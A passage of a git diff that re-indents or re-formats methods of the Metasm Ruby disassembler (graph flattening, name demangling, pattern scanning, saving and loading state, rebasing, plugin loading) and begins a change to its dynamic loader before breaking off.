accessible from the (list of) entrypoints given + # from the @decoded dasm graph + # assume all jump targets have a matching label in @prog_binding + # may add inconditionnal jumps in the listing to preserve the code flow + def flatten_graph(entry, include_subfunc=true) + ret = [] + entry = [entry] if not entry.kind_of? Array + todo = entry.map { |a| normalize(a) } + done = [] + inv_binding = @prog_binding.invert + while addr = todo.pop + next if done.include? addr or not di_at(addr) + done << addr + b = @decoded[addr].block + + ret << Label.new(inv_binding[addr]) if inv_binding[addr] + ret.concat b.list.map { |di| di.instruction } + + b.each_to_otherfunc(self) { |to| + to = normalize to + todo.unshift to if include_subfunc + } + b.each_to_samefunc(self) { |to| + to = normalize to + todo << to + } + + if not di = b.list[-1-@cpu.delay_slot] or not di.opcode.props[:stopexec] or di.opcode.props[:saveip] + to = b.list.last.next_addr + if todo.include? to + if done.include? to or not di_at(to) + if not to_l = inv_binding[to] + to_l = auto_label_at(to, 'loc') + if done.include? to and idx = ret.index(@decoded[to].block.list.first.instruction) + ret.insert(idx, Label.new(to_l)) + end + end + ret << @cpu.instr_uncond_jump_to(to_l) + else + todo << to # ensure it's next in the listing + end + end + end + end + + ret + end + + # returns a demangled C++ name + # from wgcc-2.2.2/undecorate.cpp + # TODO + def demangle_cppname(name) + ret = name + if name[0] == ?? + name = name[1..-1] + if name[0] == ?? + name = name[1..-1] + op = name[0, 1] + op = name[0, 2] if op == '_' + if op = { + '2' => "new", '3' => "delete", '4' => "=", '5' => ">>", '6' => "<<", '7' => "!", '8' => "==", '9' => "!=", + 'A' => "[]", 'C' => "->", 'D' => "*", 'E' => "++", 'F' => "--", 'G' => "-", 'H' => "+", 'I' => "&", + 'J' => "->*", 'K' => "/", 'L' => "%", 'M' => "<", 'N' => "<=", 'O' => ">", 'P' => ">=", 'Q' => ",", + 'R' => "()", 'S' => "~", 'T' => "^", 'U' => "|", 'V' => "&&", 'W' => "||", 'X' => "*=", 'Y' => "+=", + 'Z' => "-=", '_0' => "/=", '_1' => "%=", '_2' => ">>=", '_3' => "<<=", '_4' => "&=", '_5' => "|=", '_6' => "^=", + '_7' => "`vftable'", '_8' => "`vbtable'", '_9' => "`vcall'", '_A' => "`typeof'", '_B' => "`local static guard'", + '_C' => "`string'", '_D' => "`vbase destructor'", '_E' => "`vector deleting destructor'", '_F' => "`default constructor closure'", + '_G' => "`scalar deleting destructor'", '_H' => "`vector constructor iterator'", '_I' => "`vector destructor iterator'", + '_J' => "`vector vbase constructor iterator'", '_K' => "`virtual displacement map'", '_L' => "`eh vector constructor iterator'", + '_M' => "`eh vector destructor iterator'", '_N' => "`eh vector vbase constructor iterator'", '_O' => "`copy constructor closure'", + '_S' => "`local vftable'", '_T' => "`local vftable constructor closure'", '_U' => "new[]", '_V' => "delete[]", + '_X' => "`placement delete closure'", '_Y' => "`placement delete[] closure'"}[op] + ret = op[0] == ?` ? op[1..-2] : "op_#{op}" + end + end + end + # TODO + ret + end + + # scans all the sections raw for a given regexp + # return/yields all the addresses matching + # if yield returns nil/false, do not include the addr in the final result + # sections are scanned MB by MB, so this should work (slowly) on 4GB sections (eg debugger VM) + def pattern_scan(pat, chunksz=nil, margin=nil) + chunksz ||= 4*1024*1024 # scan 4MB at a time + margin ||= 65536 # add this much bytes at each chunk to find /pat/ over chunk boundaries + + pat = Regexp.new(Regexp.escape(pat)) if pat.kind_of? ::String + + found = [] + @sections.each { |sec_addr, e| + e.pattern_scan(pat, chunksz, margin) { |eo| + match_addr = sec_addr + eo + found << match_addr if not block_given? or yield(match_addr) + false + } + } + found + end + + # returns/yields [addr, string] found using pattern_scan /[\x20-\x7e]/ + def strings_scan(minlen=6) + ret = [] + nexto = 0 + pattern_scan(/[\x20-\x7e]{#{minlen},}/m, nil, 1024) { |o| + if o - nexto > 0 + next unless e = get_edata_at(o) + str = e.data[e.ptr, 1024][/[\x20-\x7e]{#{minlen},}/m] + ret << [o, str] if not block_given? or yield(o, str) + nexto = o + str.length + end + } + ret + end + + # exports the addr => symbol map (see load_map) + def save_map + @prog_binding.map { |l, o| + type = di_at(o) ? 'c' : 'd' # XXX + o = o.to_s(16).rjust(8, '0') if o.kind_of? ::Integer + "#{o} #{type} #{l}" + } + end + + # loads a map file (addr => symbol) + # off is an optionnal offset to add to every address found (for eg rebased binaries) + # understands: + # standard map files (eg linux-kernel.map: , e.g. 'c01001ba t setup_idt') + # ida map files (: ) + # arg is either the map itself or the filename of the map (if it contains no newline) + def load_map(str, off=0) + str = File.read(str) rescue nil if not str.index("\n") + sks = @sections.keys.sort + str.each_line { |l| + case l.strip + when /^([0-9A-F]+)\s+(\w+)\s+(\w+)/i # kernel.map style + set_label_at($1.to_i(16)+off, $3) + when /^([0-9A-F]+):([0-9A-F]+)\s+([a-z_]\w+)/i # IDA style + # we do not have section load order, let's just hope that the addresses are sorted (and sortable..) + # could check the 1st part of the file, with section sizes, but it is not very convenient + # the regexp is so that we skip the 1st part with section descriptions + # in the file, section 1 is the 1st section ; we have an additionnal section (exe header) which fixes the 0-index + set_label_at(sks[$1.to_i(16)] + $2.to_i(16) + off, $3) + end } - end - - # saves the dasm state in a file - def save_file(file) - tmpfile = file + '.tmp' - File.open(tmpfile, 'wb') { |fd| save_io(fd) } - File.rename tmpfile, file - end - - # saves the dasm state to an IO - def save_io(fd) - fd.puts 'Metasm.dasm' - - if @program.filename - t = @program.filename.to_s - fd.puts "binarypath #{t.length}", t - else - t = "#{@cpu.class.name.sub(/.*::/, '')} #{@cpu.size} #{@cpu.endianness}" - fd.puts "cpu #{t.length}", t - # XXX will be reloaded as a Shellcode with this CPU, but it may be a custom EXE - end - - @sections.each { |a, e| - # forget edata exports/relocs - # dump at most 16Mo per section - t = "#{Expression[a]} #{e.length}\n" + - [e.data[0, 2**24].to_str].pack('m*') - fd.puts "section #{t.length}", t - } - - t = save_map.join("\n") - fd.puts "map #{t.length}", t - - t = @decoded.map { |a, d| - next if not d.kind_of? DecodedInstruction - "#{Expression[a]},#{d.bin_length} #{d.instruction}#{" ; #{d.comment.join(' ')}" if d.comment}" - }.compact.sort.join("\n") - fd.puts "decoded #{t.length}", t - - t = @comment.map { |a, c| - c.map { |l| l.chomp }.join("\n").split("\n").map { |lc| "#{Expression[a]} #{lc.chomp}" } - }.join("\n") - fd.puts "comment #{t.length}", t - - bl = @decoded.values.map { |d| - d.block if d.kind_of? DecodedInstruction and d.block_head? - }.compact - t = bl.map { |b| - [Expression[b.address], - b.list.map { |d| Expression[d.address] }.join(','), - b.to_normal.to_a.map { |t_| Expression[t_] }.join(','), - b.to_subfuncret.to_a.map { |t_| Expression[t_] }.join(','), - b.to_indirect.to_a.map { |t_| Expression[t_] }.join(','), - b.from_normal.to_a.map { |t_| Expression[t_] }.join(','), - b.from_subfuncret.to_a.map { |t_| Expression[t_] }.join(','), - b.from_indirect.to_a.map { |t_| Expression[t_] }.join(','), - ].join(';') - }.sort.join("\n") - fd.puts "blocks #{t.length}", t - - t = @function.map { |a, f| - next if not @decoded[a] - [a, *f.return_address.to_a].map { |e| Expression[e] }.join(',') - }.compact.sort.join("\n") - # TODO binding ? - fd.puts "funcs #{t.length}", t - - t = @xrefs.map { |a, x| - a = ':default' if a == :default - a = ':unknown' if a == Expression::Unknown - # XXX origin - case x - when nil - when Xref - [Expression[a], x.type, x.len, (Expression[x.origin] if x.origin)].join(',') - when Array - x.map { |x_| [Expression[a], x_.type, x_.len, (Expression[x_.origin] if x_.origin)].join(',') } - end - }.compact.join("\n") - fd.puts "xrefs #{t.length}", t - - t = @c_parser.to_s - fd.puts "c #{t.length}", t - - #t = bl.map { |b| b.backtracked_for } - #fd.puts "trace #{t.length}" , t - end - - # loads a disassembler from a saved file - def self.load(str, &b) - d = new(nil, nil) - d.load(str, &b) - d - end - - # loads the dasm state from a savefile content - # will yield unknown segments / binarypath notfound - def load(str) - raise 'Not a metasm save file' if str[0, 12].chomp != 'Metasm.dasm' - off = 12 - pp = Preprocessor.new - app = AsmPreprocessor.new - while off < str.length - i = str.index("\n", off) || str.length - type, len = str[off..i].chomp.split - off = i+1 - data = str[off, len.to_i] - off += len.to_i - case type - when nil, '' - when 'binarypath' - data = yield(type, data) if not File.exist? data and block_given? - reinitialize AutoExe.decode_file(data) - @program.disassembler = self - @program.init_disassembler - when 'cpu' - cpuname, size, endianness = data.split - cpu = Metasm.const_get(cpuname) - raise 'invalid cpu' if not cpu < CPU - cpu = cpu.new - cpu.size = size.to_i - cpu.endianness = endianness.to_sym - reinitialize Shellcode.new(cpu) - @program.disassembler = self - @program.init_disassembler - when 'section' - info = data[0, data.index("\n") || data.length] - data = data[info.length, data.length] - pp.feed!(info) - addr = Expression.parse(pp).reduce - len = Expression.parse(pp).reduce - edata = EncodedData.new(data.unpack('m*').first, :virtsize => len) - add_section(addr, edata) - when 'map' - load_map data - when 'decoded' - data.each_line { |l| - begin - next if l !~ /^([^,]*),(\d*) ([^;]*)(?:; (.*))?/ - a, len, instr, cmt = $1, $2, $3, $4 - a = Expression.parse(pp.feed!(a)).reduce - instr = @cpu.parse_instruction(app.feed!(instr)) - di = DecodedInstruction.new(instr, a) - di.bin_length = len.to_i - di.add_comment cmt if cmt - @decoded[a] = di - rescue - puts "load: bad di #{l.inspect}" if $VERBOSE - end - } - when 'blocks' - data.each_line { |l| - bla = l.chomp.split(';').map { |sl| sl.split(',') } - begin - a = Expression.parse(pp.feed!(bla.shift[0])).reduce - b = InstructionBlock.new(a, get_section_at(a).to_a[0]) - bla.shift.each { |e| - a = Expression.parse(pp.feed!(e)).reduce - b.add_di(@decoded[a]) - } - bla.zip([:to_normal, :to_subfuncret, :to_indirect, :from_normal, :from_subfuncret, :from_indirect]).each { |l_, s| - b.send("#{s}=", l_.map { |e| Expression.parse(pp.feed!(e)).reduce }) if not l_.empty? - } - rescue - puts "load: bad block #{l.inspect}" if $VERBOSE - end - } - when 'funcs' - data.each_line { |l| - begin - a, *r = l.split(',').map { |e| Expression.parse(pp.feed!(e)).reduce } - @function[a] = DecodedFunction.new - @function[a].return_address = r if not r.empty? - @function[a].finalized = true - # TODO - rescue - puts "load: bad function #{l.inspect} #$!" if $VERBOSE - end - } - when 'comment' - data.each_line { |l| - begin - a, c = l.split(' ', 2) - a = Expression.parse(pp.feed!(a)).reduce - @comment[a] ||= [] - @comment[a] |= [c] - rescue - puts "load: bad comment #{l.inspect} #$!" if $VERBOSE - end - } - when 'c' - begin - # TODO parse_invalid_c, split per function, whatever - parse_c('') - @c_parser.allow_bad_c = true - parse_c(data, 'savefile#c') - rescue - puts "load: bad C: #$!", $!.backtrace if $VERBOSE - end - @c_parser.readtok until @c_parser.eos? if @c_parser - when 'xrefs' - data.each_line { |l| - begin - a, t, len, o = l.chomp.split(',') - case a - when ':default'; a = :default - when ':unknown'; a = Expression::Unknown - else a = Expression.parse(pp.feed!(a)).reduce - end - t = (t.empty? ? nil : t.to_sym) - len = (len != '' ? len.to_i : nil) - o = (o.to_s != '' ? Expression.parse(pp.feed!(o)).reduce : nil) # :default/:unknown ? - add_xref(a, Xref.new(t, o, len)) - rescue - puts "load: bad xref #{l.inspect} #$!" if $VERBOSE - end - } - #when 'trace' - else - if block_given? - yield(type, data) - else - puts "load: unsupported section #{type.inspect}" if $VERBOSE - end - end - end - end - - # change the base address of the loaded binary - # better done early (before disassembling anything) - # returns the delta - def rebase(newaddr) - rebase_delta(newaddr - @sections.keys.min) - end - - def rebase_delta(delta) - fix = lambda { |a| - case a - when Array - a.map! { |e| fix[e] } - when Hash - tmp = {} - a.each { |k, v| tmp[fix[k]] = v } - a.replace tmp - when Integer - a += delta - when BacktraceTrace - a.origin = fix[a.origin] - a.address = fix[a.address] - end - a - } - - fix[@sections] - fix[@decoded] - fix[@xrefs] - fix[@function] - fix[@addrs_todo] - fix[@addrs_done] - fix[@comment] - @prog_binding.each_key { |k| @prog_binding[k] = fix[@prog_binding[k]] } - @old_prog_binding.each_key { |k| @old_prog_binding[k] = fix[@old_prog_binding[k]] } - @label_alias_cache = nil - - @decoded.values.grep(DecodedInstruction).each { |di| - if di.block_head? - b = di.block - b.address += delta - fix[b.to_normal] - fix[b.to_subfuncret] - fix[b.to_indirect] - fix[b.from_normal] - fix[b.from_subfuncret] - fix[b.from_indirect] - fix[b.backtracked_for] - end - di.address = fix[di.address] - di.next_addr = fix[di.next_addr] - } - @function.each_value { |f| - f.return_address = fix[f.return_address] - fix[f.backtracked_for] - } - @xrefs.values.flatten.compact.each { |x| x.origin = fix[x.origin] } - delta - end - - # change Expression display mode for current object o to display integers as char constants - def toggle_expr_char(o) - return if not o.kind_of? Renderable - o.each_expr { |e| - e.render_info ||= {} - e.render_info[:char] = e.render_info[:char] ? nil : @cpu.endianness - } - end - - # patch Expressions in current object to include label names when available - # XXX should we also create labels ? - def toggle_expr_offset(o) - return if not o.kind_of? Renderable - o.each_expr { |e| - if n = @prog_binding[e.lexpr] - e.lexpr = n - elsif e.lexpr.kind_of? ::Integer and n = get_label_at(e.lexpr) - add_xref(normalize(e.lexpr), Xref.new(:addr, o.address)) if o.respond_to? :address - e.lexpr = n - end - if n = @prog_binding[e.rexpr] - e.rexpr = n - elsif e.rexpr.kind_of? ::Integer and n = get_label_at(e.rexpr) - add_xref(normalize(e.rexpr), Xref.new(:addr, o.address)) if o.respond_to? :address - e.rexpr = n - end - } - end - - # call this function on a function entrypoint if the function is in fact a __noreturn - # will cut the to_subfuncret of callers - def fix_noreturn(o) - each_xref(o, :x) { |a| - a = normalize(a.origin) - next if not di = di_at(a) or not di.opcode.props[:saveip] - # XXX should check if caller also becomes __noreturn - di.block.each_to_subfuncret { |to| - next if not tdi = di_at(to) or not tdi.block.from_subfuncret - tdi.block.from_subfuncret.delete_if { |aa| normalize(aa) == di.address } - tdi.block.from_subfuncret = nil if tdi.block.from_subfuncret.empty? - } - di.block.to_subfuncret = nil - } - end - - # find the addresses of calls calling the address, handles thunks - def call_sites(funcaddr) - find_call_site = proc { |a| - until not di = di_at(a) - if di.opcode.props[:saveip] - cs = di.address - break - end - if di.block.from_subfuncret.to_a.first - while di.block.from_subfuncret.to_a.length == 1 - a = di.block.from_subfuncret[0] - break if not di_at(a) - a = @decoded[a].block.list.first.address - di = @decoded[a] - end - end - break if di.block.from_subfuncret.to_a.first - break if di.block.from_normal.to_a.length != 1 - a = di.block.from_normal.first - end - cs - } - ret = [] - each_xref(normalize(funcaddr), :x) { |a| - ret << find_call_site[a.origin] - } - ret.compact.uniq - end - - # loads a disassembler plugin script - # this is simply a ruby script instance_eval() in the disassembler - # the filename argument is autocompleted with '.rb' suffix, and also - # searched for in the Metasmdir/samples/dasm-plugins subdirectory if not found in cwd - def load_plugin(plugin_filename) - if not File.exist?(plugin_filename) + end + + # saves the dasm state in a file + def save_file(file) + tmpfile = file + '.tmp' + File.open(tmpfile, 'wb') { |fd| save_io(fd) } + File.rename tmpfile, file + end + + # saves the dasm state to an IO + def save_io(fd) + fd.puts 'Metasm.dasm' + + if @program.filename + t = @program.filename.to_s + fd.puts "binarypath #{t.length}", t + else + t = "#{@cpu.class.name.sub(/.*::/, '')} #{@cpu.size} #{@cpu.endianness}" + fd.puts "cpu #{t.length}", t + # XXX will be reloaded as a Shellcode with this CPU, but it may be a custom EXE + end + + @sections.each { |a, e| + # forget edata exports/relocs + # dump at most 16Mo per section + t = "#{Expression[a]} #{e.length}\n" + + [e.data[0, 2**24].to_str].pack('m*') + fd.puts "section #{t.length}", t + } + + t = save_map.join("\n") + fd.puts "map #{t.length}", t + + t = @decoded.map { |a, d| + next if not d.kind_of? DecodedInstruction + "#{Expression[a]},#{d.bin_length} #{d.instruction}#{" ; #{d.comment.join(' ')}" if d.comment}" + }.compact.sort.join("\n") + fd.puts "decoded #{t.length}", t + + t = @comment.map { |a, c| + c.map { |l| l.chomp }.join("\n").split("\n").map { |lc| "#{Expression[a]} #{lc.chomp}" } + }.join("\n") + fd.puts "comment #{t.length}", t + + bl = @decoded.values.map { |d| + d.block if d.kind_of? DecodedInstruction and d.block_head? + }.compact + t = bl.map { |b| + [Expression[b.address], + b.list.map { |d| Expression[d.address] }.join(','), + b.to_normal.to_a.map { |t_| Expression[t_] }.join(','), + b.to_subfuncret.to_a.map { |t_| Expression[t_] }.join(','), + b.to_indirect.to_a.map { |t_| Expression[t_] }.join(','), + b.from_normal.to_a.map { |t_| Expression[t_] }.join(','), + b.from_subfuncret.to_a.map { |t_| Expression[t_] }.join(','), + b.from_indirect.to_a.map { |t_| Expression[t_] }.join(','), + ].join(';') + }.sort.join("\n") + fd.puts "blocks #{t.length}", t + + t = @function.map { |a, f| + next if not @decoded[a] + [a, *f.return_address.to_a].map { |e| Expression[e] }.join(',') + }.compact.sort.join("\n") + # TODO binding ? + fd.puts "funcs #{t.length}", t + + t = @xrefs.map { |a, x| + a = ':default' if a == :default + a = ':unknown' if a == Expression::Unknown + # XXX origin + case x + when nil + when Xref + [Expression[a], x.type, x.len, (Expression[x.origin] if x.origin)].join(',') + when Array + x.map { |x_| [Expression[a], x_.type, x_.len, (Expression[x_.origin] if x_.origin)].join(',') } + end + }.compact.join("\n") + fd.puts "xrefs #{t.length}", t + + t = @c_parser.to_s + fd.puts "c #{t.length}", t + + #t = bl.map { |b| b.backtracked_for } + #fd.puts "trace #{t.length}" , t + end + + # loads a disassembler from a saved file + def self.load(str, &b) + d = new(nil, nil) + d.load(str, &b) + d + end + + # loads the dasm state from a savefile content + # will yield unknown segments / binarypath notfound + def load(str) + raise 'Not a metasm save file' if str[0, 12].chomp != 'Metasm.dasm' + off = 12 + pp = Preprocessor.new + app = AsmPreprocessor.new + while off < str.length + i = str.index("\n", off) || str.length + type, len = str[off..i].chomp.split + off = i+1 + data = str[off, len.to_i] + off += len.to_i + case type + when nil, '' + when 'binarypath' + data = yield(type, data) if not File.exist? data and block_given? + reinitialize AutoExe.decode_file(data) + @program.disassembler = self + @program.init_disassembler + when 'cpu' + cpuname, size, endianness = data.split + cpu = Metasm.const_get(cpuname) + raise 'invalid cpu' if not cpu < CPU + cpu = cpu.new + cpu.size = size.to_i + cpu.endianness = endianness.to_sym + reinitialize Shellcode.new(cpu) + @program.disassembler = self + @program.init_disassembler + when 'section' + info = data[0, data.index("\n") || data.length] + data = data[info.length, data.length] + pp.feed!(info) + addr = Expression.parse(pp).reduce + len = Expression.parse(pp).reduce + edata = EncodedData.new(data.unpack('m*').first, :virtsize => len) + add_section(addr, edata) + when 'map' + load_map data + when 'decoded' + data.each_line { |l| + begin + next if l !~ /^([^,]*),(\d*) ([^;]*)(?:; (.*))?/ + a, len, instr, cmt = $1, $2, $3, $4 + a = Expression.parse(pp.feed!(a)).reduce + instr = @cpu.parse_instruction(app.feed!(instr)) + di = DecodedInstruction.new(instr, a) + di.bin_length = len.to_i + di.add_comment cmt if cmt + @decoded[a] = di + rescue + puts "load: bad di #{l.inspect}" if $VERBOSE + end + } + when 'blocks' + data.each_line { |l| + bla = l.chomp.split(';').map { |sl| sl.split(',') } + begin + a = Expression.parse(pp.feed!(bla.shift[0])).reduce + b = InstructionBlock.new(a, get_section_at(a).to_a[0]) + bla.shift.each { |e| + a = Expression.parse(pp.feed!(e)).reduce + b.add_di(@decoded[a]) + } + bla.zip([:to_normal, :to_subfuncret, :to_indirect, :from_normal, :from_subfuncret, :from_indirect]).each { |l_, s| + b.send("#{s}=", l_.map { |e| Expression.parse(pp.feed!(e)).reduce }) if not l_.empty? + } + rescue + puts "load: bad block #{l.inspect}" if $VERBOSE + end + } + when 'funcs' + data.each_line { |l| + begin + a, *r = l.split(',').map { |e| Expression.parse(pp.feed!(e)).reduce } + @function[a] = DecodedFunction.new + @function[a].return_address = r if not r.empty? + @function[a].finalized = true + # TODO + rescue + puts "load: bad function #{l.inspect} #$!" if $VERBOSE + end + } + when 'comment' + data.each_line { |l| + begin + a, c = l.split(' ', 2) + a = Expression.parse(pp.feed!(a)).reduce + @comment[a] ||= [] + @comment[a] |= [c] + rescue + puts "load: bad comment #{l.inspect} #$!" if $VERBOSE + end + } + when 'c' + begin + # TODO parse_invalid_c, split per function, whatever + parse_c('') + @c_parser.allow_bad_c = true + parse_c(data, 'savefile#c') + rescue + puts "load: bad C: #$!", $!.backtrace if $VERBOSE + end + @c_parser.readtok until @c_parser.eos? if @c_parser + when 'xrefs' + data.each_line { |l| + begin + a, t, len, o = l.chomp.split(',') + case a + when ':default'; a = :default + when ':unknown'; a = Expression::Unknown + else a = Expression.parse(pp.feed!(a)).reduce + end + t = (t.empty? ? nil : t.to_sym) + len = (len != '' ? len.to_i : nil) + o = (o.to_s != '' ? Expression.parse(pp.feed!(o)).reduce : nil) # :default/:unknown ? + add_xref(a, Xref.new(t, o, len)) + rescue + puts "load: bad xref #{l.inspect} #$!" if $VERBOSE + end + } + #when 'trace' + else + if block_given? + yield(type, data) + else + puts "load: unsupported section #{type.inspect}" if $VERBOSE + end + end + end + end + + # change the base address of the loaded binary + # better done early (before disassembling anything) + # returns the delta + def rebase(newaddr) + rebase_delta(newaddr - @sections.keys.min) + end + + def rebase_delta(delta) + fix = lambda { |a| + case a + when Array + a.map! { |e| fix[e] } + when Hash + tmp = {} + a.each { |k, v| tmp[fix[k]] = v } + a.replace tmp + when Integer + a += delta + when BacktraceTrace + a.origin = fix[a.origin] + a.address = fix[a.address] + end + a + } + + fix[@sections] + fix[@decoded] + fix[@xrefs] + fix[@function] + fix[@addrs_todo] + fix[@addrs_done] + fix[@comment] + @prog_binding.each_key { |k| @prog_binding[k] = fix[@prog_binding[k]] } + @old_prog_binding.each_key { |k| @old_prog_binding[k] = fix[@old_prog_binding[k]] } + @label_alias_cache = nil + + @decoded.values.grep(DecodedInstruction).each { |di| + if di.block_head? + b = di.block + b.address += delta + fix[b.to_normal] + fix[b.to_subfuncret] + fix[b.to_indirect] + fix[b.from_normal] + fix[b.from_subfuncret] + fix[b.from_indirect] + fix[b.backtracked_for] + end + di.address = fix[di.address] + di.next_addr = fix[di.next_addr] + } + @function.each_value { |f| + f.return_address = fix[f.return_address] + fix[f.backtracked_for] + } + @xrefs.values.flatten.compact.each { |x| x.origin = fix[x.origin] } + delta + end + + # change Expression display mode for current object o to display integers as char constants + def toggle_expr_char(o) + return if not o.kind_of? Renderable + o.each_expr { |e| + e.render_info ||= {} + e.render_info[:char] = e.render_info[:char] ? nil : @cpu.endianness + } + end + + # patch Expressions in current object to include label names when available + # XXX should we also create labels ? + def toggle_expr_offset(o) + return if not o.kind_of? Renderable + o.each_expr { |e| + if n = @prog_binding[e.lexpr] + e.lexpr = n + elsif e.lexpr.kind_of? ::Integer and n = get_label_at(e.lexpr) + add_xref(normalize(e.lexpr), Xref.new(:addr, o.address)) if o.respond_to? :address + e.lexpr = n + end + if n = @prog_binding[e.rexpr] + e.rexpr = n + elsif e.rexpr.kind_of? ::Integer and n = get_label_at(e.rexpr) + add_xref(normalize(e.rexpr), Xref.new(:addr, o.address)) if o.respond_to? :address + e.rexpr = n + end + } + end + + # call this function on a function entrypoint if the function is in fact a __noreturn + # will cut the to_subfuncret of callers + def fix_noreturn(o) + each_xref(o, :x) { |a| + a = normalize(a.origin) + next if not di = di_at(a) or not di.opcode.props[:saveip] + # XXX should check if caller also becomes __noreturn + di.block.each_to_subfuncret { |to| + next if not tdi = di_at(to) or not tdi.block.from_subfuncret + tdi.block.from_subfuncret.delete_if { |aa| normalize(aa) == di.address } + tdi.block.from_subfuncret = nil if tdi.block.from_subfuncret.empty? + } + di.block.to_subfuncret = nil + } + end + + # find the addresses of calls calling the address, handles thunks + def call_sites(funcaddr) + find_call_site = proc { |a| + until not di = di_at(a) + if di.opcode.props[:saveip] + cs = di.address + break + end + if di.block.from_subfuncret.to_a.first + while di.block.from_subfuncret.to_a.length == 1 + a = di.block.from_subfuncret[0] + break if not di_at(a) + a = @decoded[a].block.list.first.address + di = @decoded[a] + end + end + break if di.block.from_subfuncret.to_a.first + break if di.block.from_normal.to_a.length != 1 + a = di.block.from_normal.first + end + cs + } + ret = [] + each_xref(normalize(funcaddr), :x) { |a| + ret << find_call_site[a.origin] + } + ret.compact.uniq + end + + # loads a disassembler plugin script + # this is simply a ruby script instance_eval() in the disassembler + # the filename argument is autocompleted with '.rb' suffix, and also + # searched for in the Metasmdir/samples/dasm-plugins subdirectory if not found in cwd + def load_plugin(plugin_filename) + if not File.exist?(plugin_filename) if File.exist?(plugin_filename+'.rb') - plugin_filename += '.rb' - elsif defined? Metasmdir - # try autocomplete - pf = File.join(Metasmdir, 'samples', 'dasm-plugins', plugin_filename) - if File.exist? pf - plugin_filename = pf - elsif File.exist? pf + '.rb' - plugin_filename = pf + '.rb' - end - end - end - - instance_eval File.read(plugin_filename) - end - - # same as load_plugin, but hides the @gui attribute while loading, preventing the plugin do popup stuff - # this is useful when you want to load a plugin from another plugin to enhance the plugin's functionnality - # XXX this also prevents setting up kbd_callbacks etc.. - def load_plugin_nogui(plugin_filename) - oldgui = gui - @gui = nil - load_plugin(plugin_filename) - ensure - @gui = oldgui - end - - # compose two code/instruction's backtrace_binding - # assumes bd1 is followed by bd2 in the code flow - # eg inc edi + push edi => - # { Ind[:esp, 4] => Expr[:edi + 1], :esp => Expr[:esp - 4], :edi => Expr[:edi + 1] } - # XXX if bd1 writes to memory with a pointer that is reused in bd2, this function has to - # revert the change made by bd2, which only works with simple ptr addition now - # XXX unhandled situations may be resolved using :unknown, or by returning incorrect values - def compose_bt_binding(bd1, bd2) - if bd1.kind_of? DecodedInstruction - bd1 = bd1.backtrace_binding ||= cpu.get_backtrace_binding(bd1) - end - if bd2.kind_of? DecodedInstruction - bd2 = bd2.backtrace_binding ||= cpu.get_backtrace_binding(bd2) - end - - reduce = lambda { |e| Expression[Expression[e].reduce] } - - bd = {} - - bd2.each { |k, v| - bd[k] = reduce[v.bind(bd1)] - } - - # for each pointer appearing in keys of bd1, we must infer from bd2 what final - # pointers should appear in bd - # eg 'mov [eax], 0 mov ebx, eax' => { [eax] <- 0, [ebx] <- 0, ebx <- eax } - bd1.each { |k, v| - if k.kind_of? Indirection - done = false - k.pointer.externals.each { |e| - # XXX this will break on nontrivial pointers or bd2 - bd2.each { |k2, v2| - # we dont want to invert computation of flag_zero/carry etc (booh) - next if k2.to_s =~ /flag/ - - # discard indirection etc, result would be too complex / not useful - next if not Expression[v2].expr_externals.include? e - - done = true - - # try to reverse the computation made upon 'e' - # only simple addition handled here - ptr = reduce[k.pointer.bind(e => Expression[[k2, :-, v2], :+, e])] - - # if bd2 does not rewrite e, duplicate the original pointer - if not bd2[e] - bd[k] ||= reduce[v] - - # here we should not see 'e' in ptr anymore - ptr = Expression::Unknown if ptr.externals.include? e - else - # cant check if add reversion was successful.. - end - - bd[Indirection[reduce[ptr], k.len]] ||= reduce[v] - } - } - bd[k] ||= reduce[v] if not done - else - bd[k] ||= reduce[v] - end - } - - bd - end + plugin_filename += '.rb' + elsif defined? Metasmdir + # try autocomplete + pf = File.join(Metasmdir, 'samples', 'dasm-plugins', plugin_filename) + if File.exist? pf + plugin_filename = pf + elsif File.exist? pf + '.rb' + plugin_filename = pf + '.rb' + end + end + end + + instance_eval File.read(plugin_filename) + end + + # same as load_plugin, but hides the @gui attribute while loading, preventing the plugin do popup stuff + # this is useful when you want to load a plugin from another plugin to enhance the plugin's functionnality + # XXX this also prevents setting up kbd_callbacks etc.. + def load_plugin_nogui(plugin_filename) + oldgui = gui + @gui = nil + load_plugin(plugin_filename) + ensure + @gui = oldgui + end + + # compose two code/instruction's backtrace_binding + # assumes bd1 is followed by bd2 in the code flow + # eg inc edi + push edi => + # { Ind[:esp, 4] => Expr[:edi + 1], :esp => Expr[:esp - 4], :edi => Expr[:edi + 1] } + # XXX if bd1 writes to memory with a pointer that is reused in bd2, this function has to + # revert the change made by bd2, which only works with simple ptr addition now + # XXX unhandled situations may be resolved using :unknown, or by returning incorrect values + def compose_bt_binding(bd1, bd2) + if bd1.kind_of? DecodedInstruction + bd1 = bd1.backtrace_binding ||= cpu.get_backtrace_binding(bd1) + end + if bd2.kind_of? DecodedInstruction + bd2 = bd2.backtrace_binding ||= cpu.get_backtrace_binding(bd2) + end + + reduce = lambda { |e| Expression[Expression[e].reduce] } + + bd = {} + + bd2.each { |k, v| + bd[k] = reduce[v.bind(bd1)] + } + + # for each pointer appearing in keys of bd1, we must infer from bd2 what final + # pointers should appear in bd + # eg 'mov [eax], 0 mov ebx, eax' => { [eax] <- 0, [ebx] <- 0, ebx <- eax } + bd1.each { |k, v| + if k.kind_of? Indirection + done = false + k.pointer.externals.each { |e| + # XXX this will break on nontrivial pointers or bd2 + bd2.each { |k2, v2| + # we dont want to invert computation of flag_zero/carry etc (booh) + next if k2.to_s =~ /flag/ + + # discard indirection etc, result would be too complex / not useful + next if not Expression[v2].expr_externals.include? e + + done = true + + # try to reverse the computation made upon 'e' + # only simple addition handled here + ptr = reduce[k.pointer.bind(e => Expression[[k2, :-, v2], :+, e])] + + # if bd2 does not rewrite e, duplicate the original pointer + if not bd2[e] + bd[k] ||= reduce[v] + + # here we should not see 'e' in ptr anymore + ptr = Expression::Unknown if ptr.externals.include? e + else + # cant check if add reversion was successful.. + end + + bd[Indirection[reduce[ptr], k.len]] ||= reduce[v] + } + } + bd[k] ||= reduce[v] if not done + else + bd[k] ||= reduce[v] + end + } + + bd + end end end diff --git a/lib/metasm/metasm/dynldr.rb b/lib/metasm/metasm/dynldr.rb index 68967bd925fed..38af7becc7bf5 100644 --- a/lib/metasm/metasm/dynldr.rb +++ b/lib/metasm/metasm/dynldr.rb @@ -9,8 +9,8 @@ module Metasm class DynLdr - # basic C defs for ruby internals - 1.8 and 1.9 compat - x86/x64 - RUBY_H = < 64) - rb_raise(*rb_eArgError, "bad args"); - - uintptr_t flags_v = VAL2INT(flags); - uintptr_t ptr_v = VAL2INT(ptr); - 